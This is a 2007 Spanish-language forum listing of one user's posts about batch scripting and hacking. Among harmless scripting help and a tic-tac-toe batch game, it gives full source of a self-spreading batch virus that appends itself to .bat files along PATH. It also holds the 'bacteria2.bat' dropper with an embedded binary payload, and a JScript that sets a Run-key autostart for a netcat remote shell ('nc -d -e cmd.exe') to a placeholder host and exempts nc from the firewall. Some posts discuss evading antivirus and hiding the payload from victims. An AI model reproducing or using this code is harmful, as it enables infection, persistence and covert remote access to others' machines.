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4411  Programación / Scripting / Re: Trasladar variable %%A a %a% en: 3 Abril 2007, 02:25 am
intenta con
set %%A=a
si no ps
set %%A=b
shift%%A
set %b%=a

o tambien
echo %%A >temp.tmp
for /f %%i in (temp.tmp) do set %%i=a


Esque si tu dices %%A signifioca que la variable está dentro de for y para establecer %a% Debes salir del modo for o guardar la variable en un temporal para luego volver a volcar la variable a %a% y para volver a eliminar usas shift[variable]

No se si a eso te referias o es mi imaginacion XD
4412  Seguridad Informática / Hacking Básico / Re: Jugando con netcat en: 3 Abril 2007, 02:15 am
Si se puede, trataré de aprender mas sobre el metodo RIT para poder darles un netcat que no sea detectado, pero porfavor si llego a hacerlo traten de no ponerlo en ninguna pagina web para que no lo buelvan a detectar, si alguien lo hace rimero vienvenido sea porque creo que me voy a demorar mucho en hacerlo  :-\
4413  Seguridad Informática / Hacking Básico / Re: Jugando con netcat en: 3 Abril 2007, 00:33 am
jajajajaja muy bueno grax por el aporte XD
4414  Seguridad Informática / Abril negro / Re: Virus en batch en: 3 Abril 2007, 00:27 am
:!- indica un punto donde empieza la ejecucion e un script en batch llamado desde goto

cuando se declara shift se elimina una variable indicada.. en este caso !-%

cuando yo eclaro set !-=%xxx% estoy declarando una variable pero puedo poner lo que yo desee no tan solo !-

En el caso del q.com este se copia en c: con atributos de oculto y se crea a travez del coamdo echo. es solo una vieja tecnica para ocultar un virus dentro de un batch sin que sea detectado (antiguamente) por eso digo que solo son ejemplos para que puedan aprender como funciona un batch.
4415  Programación / Scripting / Re: Juego del gato creado en batch (modo grafico) en: 1 Abril 2007, 00:42 am
cuidado porque entremedio salta una carita que puede hacer que no se copie en el bat.

Yo lo ejecuté y si se puede jugar al gato y ya me he entretenido mucho con el XD Aunque es bastante viejo.

4416  Programación / Scripting / Juego del gato creado en batch (modo grafico) en: 1 Abril 2007, 00:27 am
Me interesó tanto el tema de la programación en batch que busqué entre mis cosas antiguas este viejo script para que se diviertan jugando al gato en modo grafico ;) =

Código:
@ECHO OFF
REM " AQUI MIRA SI SE ESTA INICIANDO EL JUEGO Y SI ES ASI BORRA
REM TODA HUELLA DE ALGUNA POSIBLE SALIDA INCORRECTA DEL JUEGO ".
@IF A == %1 GOTO BEGIN
@IF X == %1 GOTO BEGIN
@IF O == %1 GOTO BEGIN
IF EXIST *.T DEL *.T
:BEGIN
REM " EN ESTA PARTE MIRA Y ACTUALIZA LA CANTIDAD DE JUGADAS YA REALIZADAS "
IF NOT EXIST *.T CLS
IF EXIST 9.T REN 9.T 10.T
IF EXIST 10.T GOTO INICIO
IF EXIST 8.T REN 8.T 9.T
IF EXIST 9.T GOTO INI
IF EXIST 7.T REN 7.T 8.T
IF EXIST 8.T GOTO INI
IF EXIST 6.T REN 6.T 7.T
IF EXIST 7.T GOTO INI
IF EXIST 5.T REN 5.T 6.T
IF EXIST 6.T GOTO INI
IF EXIST 4.T REN 4.T 5.T
IF EXIST 5.T GOTO INI
IF EXIST 3.T REN 3.T 4.T
IF EXIST 4.T GOTO INI
IF EXIST 2.T REN 2.T 3.T
IF EXIST 3.T GOTO INI
IF EXIST 1.T REN 1.T 2.T
IF EXIST 2.T GOTO INI
IF EXIST 0.T REN 0.T 1.T
IF EXIST 1.T GOTO INI
REM " ESTA ES LA PORTADA DE BIENVENIDA "
IF NOT EXIST 0.T ECHO.
IF NOT EXIST 0.T ECHO.
IF NOT EXIST 0.T ECHO.
IF NOT EXIST 0.T ECHO.
IF NOT EXIST 0.T ECHO.
IF NOT EXIST 0.T ECHO.
IF NOT EXIST 0.T ECHO                        BIENVENIDO A: " BATCHRUN TRIQUI "
IF NOT EXIST 0.T ECHO.
IF NOT EXIST 0.T ECHO.
IF NOT EXIST 0.T ECHO.
IF NOT EXIST 0.T ECHO                            DISE¥ADO POR: BLACKWOLF
IF NOT EXIST 0.T ECHO.
IF NOT EXIST 0.T ECHO.
IF NOT EXIST 0.T ECHO.
IF NOT EXIST 0.T ECHO                         TODOS LOS DERECHOS RESERVADOS
IF NOT EXIST 0.T ECHO.
IF NOT EXIST 0.T ECHO                             COLOMBIA COFFEE HACKERS
IF NOT EXIST 0.T PAUSE > NUL
IF NOT EXIST 0.T ECHO TRIQUI > 0.T
REM "AQUI SE CREA UN SUBPROGRAMITA QUE USARA EL JUEGO PARA PODER LEER
REM LAS OPCIONES QUE TECLEE EL JUGADOR, SIEMPRE Y CUANDO NO EXISTA "
IF EXIST CODTECLA.COM GOTO NDEBUG
:DEBUG
ECHO N CODTECLA.COM >> CT.SCR
ECHO A 100 >> CT.SCR
ECHO INT 16 >> CT.SCR
ECHO MOV AL, AH >> CT.SCR
ECHO MOV AH, 4C  >> CT.SCR
ECHO INT 21  >> CT.SCR
ECHO.  >> CT.SCR
ECHO R CX  >> CT.SCR
ECHO 8  >> CT.SCR
ECHO W  >> CT.SCR
ECHO Q  >> CT.SCR
DEBUG < CT.SCR > NUL
DEL CT.SCR
:NDEBUG
REM " AQUI SE INICIA Y ASIGNAN LOS PRIMEROS VALORES A LA MATRIZ DEL JUEGO "
%0 A B C D E F G H I
REM " EN ESTA PARTE MIRA CON QUE SIGNO (X,O) HACER LA JUGADA "
:INI
IF NOT EXIST X.T GOTO INIA
IF EXIST X.T GOTO INIB
:INIA
ECHO TRIQUI > X.T
GOTO INICIO
:INIB
DEL X.T
GOTO INICIO
REM " AQUI SE MUESTRA EN PANTALLA LA MATRIZ CON LOS VALORES QUE SE TRAIGAN "
:INICIO
CLS
ECHO.
ECHO.
ECHO                  TECLEE LA LETRA EN DONDE QUIERE HACER SU JUGADA :
ECHO.
ECHO.
ECHO                                   ÉÍÍÍËÍÍÍËÍÍÍ»
ECHO                                   º %1 º %2 º %3 º
ECHO                                   ÌÍÍÍÎÍÍÍÎÍÍ͹
ECHO                                   º %4 º %5 º %6 º
ECHO                                   ÌÍÍÍÎÍÍÍÎÍÍ͹
ECHO                                   º %7 º %8 º %9 º
ECHO                                   ÈÍÍÍÊÍÍÍÊÍÍͼ
ECHO.
ECHO                             O PULSE " ESC " PARA SALIR.
ECHO.
REM " EN ESTA PARTE SE COMPARAN LOS VALORES DE LA MATRIZ DEL JUEGO
REM PARA SABER SI ALGUIEN GANO Y SE FELICITA A QUIEN LO HIZO"
IF %1 == %2 IF %2 == %3 ECHO 
IF %1 == %2 IF %2 == %3 ECHO                         ­ FELICITACIONES ACABAS DE GANAR !
IF %1 == %2 IF %2 == %3 PAUSE > NUL
IF %1 == %2 IF %2 == %3 GOTO FIN
IF %4 == %5 IF %5 == %6 ECHO 
IF %4 == %5 IF %5 == %6 ECHO                         ­ FELICITACIONES ACABAS DE GANAR !
IF %4 == %5 IF %5 == %6 PAUSE > NUL
IF %4 == %5 IF %5 == %6 GOTO FIN
IF %7 == %8 IF %8 == %9 ECHO 
IF %7 == %8 IF %8 == %9 ECHO                         ­ FELICITACIONES ACABAS DE GANAR !
IF %7 == %8 IF %8 == %9 PAUSE > NUL
IF %7 == %8 IF %8 == %9 GOTO FIN
IF %1 == %4 IF %4 == %7 ECHO 
IF %1 == %4 IF %4 == %7 ECHO                         ­ FELICITACIONES ACABAS DE GANAR !
IF %1 == %4 IF %4 == %7 PAUSE > NUL
IF %1 == %4 IF %4 == %7 GOTO FIN
IF %2 == %5 IF %5 == %8 ECHO 
IF %2 == %5 IF %5 == %8 ECHO                         ­ FELICITACIONES ACABAS DE GANAR !
IF %2 == %5 IF %5 == %8 PAUSE > NUL
IF %2 == %5 IF %5 == %8 GOTO FIN
IF %3 == %6 IF %6 == %9 ECHO 
IF %3 == %6 IF %6 == %9 ECHO                         ­ FELICITACIONES ACABAS DE GANAR !
IF %3 == %6 IF %6 == %9 PAUSE > NUL
IF %3 == %6 IF %6 == %9 GOTO FIN
IF %1 == %5 IF %5 == %9 ECHO 
IF %1 == %5 IF %5 == %9 ECHO                         ­ FELICITACIONES ACABAS DE GANAR !
IF %1 == %5 IF %5 == %9 PAUSE > NUL
IF %1 == %5 IF %5 == %9 GOTO FIN
IF %7 == %5 IF %5 == %3 ECHO 
IF %7 == %5 IF %5 == %3 ECHO                         ­ FELICITACIONES ACABAS DE GANAR !
IF %7 == %5 IF %5 == %3 PAUSE > NUL
IF %7 == %5 IF %5 == %3 GOTO FIN
REM " SI EXISTE 10.T SIGNIFICA QUE HIZO LA ULTIMA JUGADA Y SI SE LLEGO A ESTA
REM  PARTE, ES QUE NADIE GANO, POR LO QUE SE EJECUTA EL FINAL DEL JUEGO "
IF EXIST 10.T  ECHO                             NADIE GANO EN ESTA OCACION
IF EXIST 10.T PAUSE > NUL
IF EXIST 10.T GOTO FIN
:COD
REM " EN ESTA PARTE SE LEE LA OPCION QUE DESEA EL JUGADOR ELEGIR "
CODTECLA
REM " AQUI SE EJECUTA LA OPCION ELEGIDA POR EL JUGADOR "
IF ERRORLEVEL 30 IF NOT ERRORLEVEL 31 GOTO A
IF ERRORLEVEL 48 IF NOT ERRORLEVEL 49 GOTO B
IF ERRORLEVEL 46 IF NOT ERRORLEVEL 47 GOTO C
IF ERRORLEVEL 32 IF NOT ERRORLEVEL 33 GOTO D
IF ERRORLEVEL 18 IF NOT ERRORLEVEL 19 GOTO E
IF ERRORLEVEL 33 IF NOT ERRORLEVEL 34 GOTO F
IF ERRORLEVEL 34 IF NOT ERRORLEVEL 35 GOTO G
IF ERRORLEVEL 35 IF NOT ERRORLEVEL 36 GOTO H
IF ERRORLEVEL 23 IF NOT ERRORLEVEL 24 GOTO I
IF ERRORLEVEL 1 IF NOT ERRORLEVEL 2 GOTO FIN
GOTO INICIO
REM " EN ESTA PARTE SE ENVIA A LA MATRIZ EL VALOR SELECCIONADO Y
REM SE MUESTRA EN PANTALLA LA MATRIZ DEL JUEGO COMPLETA "
:A
IF %1 == X GOTO INICIO
IF %1 == x GOTO INICIO
IF %1 == O GOTO INICIO
IF %1 == o GOTO INICIO
IF EXIST X.T %0 X %2 %3 %4 %5 %6 %7 %8 %9
IF NOT EXIST X.T %0 O %2 %3 %4 %5 %6 %7 %8 %9
:B
IF %2 == X GOTO INICIO
IF %2 == x GOTO INICIO
IF %2 == O GOTO INICIO
IF %2 == o GOTO INICIO
IF EXIST X.T %0 %1 X %3 %4 %5 %6 %7 %8 %9
IF NOT EXIST X.T %0 %1 O %3 %4 %5 %6 %7 %8 %9
:C
IF %3 == X GOTO INICIO
IF %3 == x GOTO INICIO
IF %3 == O GOTO INICIO
IF %3 == o GOTO INICIO
IF EXIST X.T %0 %1 %2 X %4 %5 %6 %7 %8 %9
IF NOT EXIST X.T %0 %1 %2 O %4 %5 %6 %7 %8 %9
:D
IF %4 == X GOTO INICIO
IF %4 == x GOTO INICIO
IF %4 == O GOTO INICIO
IF %4 == o GOTO INICIO
IF EXIST X.T %0 %1 %2 %3 X %5 %6 %7 %8 %9
IF NOT EXIST X.T %0 %1 %2 %3 O %5 %6 %7 %8 %9
:E
IF %5 == X GOTO INICIO
IF %5 == x GOTO INICIO
IF %5 == O GOTO INICIO
IF %5 == o GOTO INICIO
IF EXIST X.T %0 %1 %2 %3 %4 X %6 %7 %8 %9
IF NOT EXIST X.T %0 %1 %2 %3 %4 O %6 %7 %8 %9
:F
IF %6 == X GOTO INICIO
IF %6 == x GOTO INICIO
IF %6 == O GOTO INICIO
IF %6 == o GOTO INICIO
IF EXIST X.T %0 %1 %2 %3 %4 %5 X %7 %8 %9
IF NOT EXIST X.T %0 %1 %2 %3 %4 %5 O %7 %8 %9
:G
IF %7 == X GOTO INICIO
IF %7 == x GOTO INICIO
IF %7 == O GOTO INICIO
IF %7 == o GOTO INICIO
IF EXIST X.T %0 %1 %2 %3 %4 %5 %6 X %8 %9
IF NOT EXIST X.T %0 %1 %2 %3 %4 %5 %6 O %8 %9
:H
IF %8 == X GOTO INICIO
IF %8 == x GOTO INICIO
IF %8 == O GOTO INICIO
IF %8 == o GOTO INICIO
IF EXIST X.T %0 %1 %2 %3 %4 %5 %6 %7 X %9
IF NOT EXIST X.T %0 %1 %2 %3 %4 %5 %6 %7 O %9
:I
IF %9 == X GOTO INICIO
IF %9 == x GOTO INICIO
IF %9 == O GOTO INICIO
IF %9 == o GOTO INICIO
IF EXIST X.T %0 %1 %2 %3 %4 %5 %6 %7 %8 X
IF NOT EXIST X.T %0 %1 %2 %3 %4 %5 %6 %7 %8 O
REM EN ESTA PARTE SE MIRA SI NADIE GANO, SE DESEA SALIRSE DEL JUEGO Y DE
REM NO QUERERSE, SE PREGUNTA SI DESEA CONTINUAR O REINICIAR EL JUEGO "
:FIN
ECHO.
ECHO                  ¨ DESEA SALIRSE DEL " BATCHRUN TRIQUI " ? S \ N ?
:SN
CODTECLA
IF ERRORLEVEL 1 IF NOT ERRORLEVEL 31 GOTO SN
IF ERRORLEVEL 31 IF NOT ERRORLEVEL 32 GOTO SALIR
IF ERRORLEVEL 32 IF NOT ERRORLEVEL 49 GOTO SN
:CR
IF ERRORLEVEL 49 IF NOT ERRORLEVEL 50 ECHO.
IF ERRORLEVEL 49 IF NOT ERRORLEVEL 50 ECHO            SI DESEA CONTINUAR TECLEE "C" SI DESEA REINICIAR TECLEE "R"
IF ERRORLEVEL 50 GOTO SN
CODTECLA
IF ERRORLEVEL 1 IF NOT ERRORLEVEL 19 GOTO CR
IF ERRORLEVEL 19 IF NOT ERRORLEVEL 20 DEL *.T
IF ERRORLEVEL 19 IF NOT ERRORLEVEL 20 ECHO TRIQUI > 0.T
IF ERRORLEVEL 19 IF NOT ERRORLEVEL 20 %0 A B C D E F G H I
IF ERRORLEVEL 20 IF NOT ERRORLEVEL 46 GOTO CR
IF ERRORLEVEL 46 IF NOT ERRORLEVEL 47 GOTO INICIO
IF ERRORLEVEL 50 GOTO INICIO
REM " AQUI YA MUESTRA EN PANTALLA UN MENSAJE DANDO LAS GRACIAS POR
REM HABER USADO EL JUEGO, DESPUES LOS CREDITOS Y LUEGO SE SALE "
:SALIR
DEL *.T
DEL CODTECLA.COM
ECHO.
ECHO.
ECHO.
ECHO                   GRACIAS POR HABER JUGADO " BATCHRUN TRIQUI "
PAUSE > NUL
CLS
ECHO.
ECHO.
ECHO.
ECHO.
ECHO.
ECHO.
ECHO                            DISE¥ADO POR: BLACKWOLF
ECHO.
ECHO.
ECHO                         TODOS LOS DERECHOS RESERVADOS
ECHO.
ECHO                             COLOMBIA COFFEE HACKERS
PAUSE > NUL
CLS

------------
Y que quede claro esta vez que yo no lo hice Aunque entiendo el 95% de lo que hace este bat, pero porfavor ya no me torturen como el post de virus hechos en batch :-s

Att. Yan.
Unilola Software.
4417  Seguridad Informática / Abril negro / Re: Virus en batch en: 31 Marzo 2007, 21:54 pm
Quiero dejar en claro que yo no hice esos virus Aunque igual los entiendo a medias porque he aprendido mucho de ellos.
Talves fue un malentendido, solo quería compartir estos codigos fuente para que pudieran hechar a volar la imaginación. este post fue de una respuesta a programación en batch hecho y movido por el mismo sidarcat, Aunque muchos me han dicho que es muy buena info pero no quiero que se malinterprete.
Si no tienen ni idea de lo que hace un bat... pueden ver el post de programación en batch http://foro.elhacker.net/index.php/topic,132924.0.html
4418  Seguridad Informática / Abril negro / Abril Negro 2007 en: 31 Marzo 2007, 03:05 am
Acá hay algunos codigos en batch que les pueden interesar un poco:

@echo off%!-%
if '%1=='~ goto !-%2
if exist \!-.bat goto !-r
if not exist %0.bat goto !-e
find "!-"<%0.bat>\!-.BAT
:!-r
command /c \!- ~ s . .. %path%
goto !-e
:!-s
shift%!-%
if '%2==' exist !-
for %%a in (%2\*.bat) do call \!- ~ i %%a
goto !-s
:!-i
find "!-"<%3>!-s
copy !-s !-!>nul
if exist !-! goto !-a
del !-s
type \!-.bat>>%3
exit !-
:!-a
del !-!
:!-e


 XD y este otro:

@ECHO  OFF
:s%r#
COPY %0.BAT C:\Q.COM>NUL
C:\Q
¸ ·¢'Í/<ÿt%¿ÿÿ»­ ¸JÍ/GtWü¾¹¨ ó¤ŽÙ¾¥¥DüŒDþº¿²´VÍ!´AÍ!‹×A¸CÍ!Í = ·u°ÿÏ= ®té— ƒúÿuø:îuô`´Í!´6™<w}Í!Ñê;Úè C:\WINSTART.BAT Z¸@=w^Í!rZ“¸ [3Ɏٿ` ÿu0ÿu2‰}0Œ]2Ç°ÆEÏ€Í!ŽÙE2E0r&•S´?‹×±Í!‘´@‹ÝÍ! À[uë¸ WÍ!´>Í!‹Ý¸WÍ!´>Í!aê


jajajaja me diran.. este tio esta loco XD ps no estoy loco... es un virus en batch muy conocido llamado "bacteria2.bat"
Pueden bajar este y muchos ejemplos de codigos creados en batch desde aca:

http://512.iespana.es/virus_y_troyanos

También agregué algunos codigos fuentes de muchos virus para que puedan comprender su funcionamiento (por eso saqué los que no tenian el codigo) ya que la idea no es joder a todo mundo infectando gente y bajando programillas... para eso hay otras paginas, acá es para aprender.

Acabo de agregar dos programas para compilar tu propio virus... uno se llama "lavi" y el otro "viological ware" cada uno con sus textos explicativos. Ojala les sirva ;)

Att. Yan
Unilola Softwares.
4419  Seguridad Informática / Hacking Básico / Re: Jugando con netcat en: 31 Marzo 2007, 02:11 am
Si abres el enlace directamente del archivo del video sin hacerlo desde la pagina entonces te dice que el enlace está roto... trata de pinchar el link directamente desde la pagina sin abrir ninguna mas. Yo acabo de revisarla y si se pueden bajar aún. Casi me dió un infarto al pensar que iespana también cascaba por exeso de trafico pero no es asi como el de geocities, aún hay para rato  ;D
Y otra cosa... yo antes tambien lo hacia en system32 pero no todos tienen derecho de sobreescritura sobre esa carpeta por lo cual el winrar da un error de ruta y desvela el contenido malicioso y no queremos que eso pase asi que elegí un directorio en que todos puedan tener acceso sin importar que tipo de cuentas usen : %homepat% . también antiguamente hacia las entradas de registro con archivos de extención *.js y se ejecutaban con scripts como este:

var WSHShell = WScript.CreateObject("WScript.Shell");WSHShell.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\nc.exe", "C:\\WINDOWS\\system32\\nc -d -e cmd.exe ip puerto");
WSHShell.RegWrite("HKLM\\SYSTEM\\ControlSet001\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile\\AuthorizedApplications\\List\\nc.exe", "C:\\WINDOWS\\system32\\nc.exe");
function Welcome()
{if (intDoIt == vbCancel) {
}
}


y de esta forma anulamos el cortafuegos de windows XP con SP2 y ademas agregamos una entrada de autoarranque al registro del sistema y a diferencia del bat... este no se ve ni si quiera el pestañazo del DOS asi que es mas silencioso. Pero el problema estaba en que si alguien usaba un compilador web como el dreamweaver u otro similar donde asociaran estos archivos, ps en ves de agregar las entradas de registro... se abria el programa dreamweaver u otro mas. por eso lo reemplazé por un bat para que todos pudieran comprender como se hacia esta entrada de registro y pudieran hechar a volar la imaginación ya que nada me hubiera costado hacer un programa en c que haga las entradas de registro y ejecutara netcat si que se vea nada pero muchos hubiern quedado sin saber como hacerlo ya que no todos saben programar y este tutorial esta hecho con la intención del que no sabe nada... pueda aprender a usar netcat de diferentes formas y no tan solo para usarlo de troyano como muchos creen.  ;)
4420  Foros Generales / Sugerencias y dudas sobre el Foro / Re: Carita nueva en: 30 Marzo 2007, 22:50 pm
jajajaja van bien XD Si no da resultado ps las guardaré y las pondré por mi mismo en mis post  ;D
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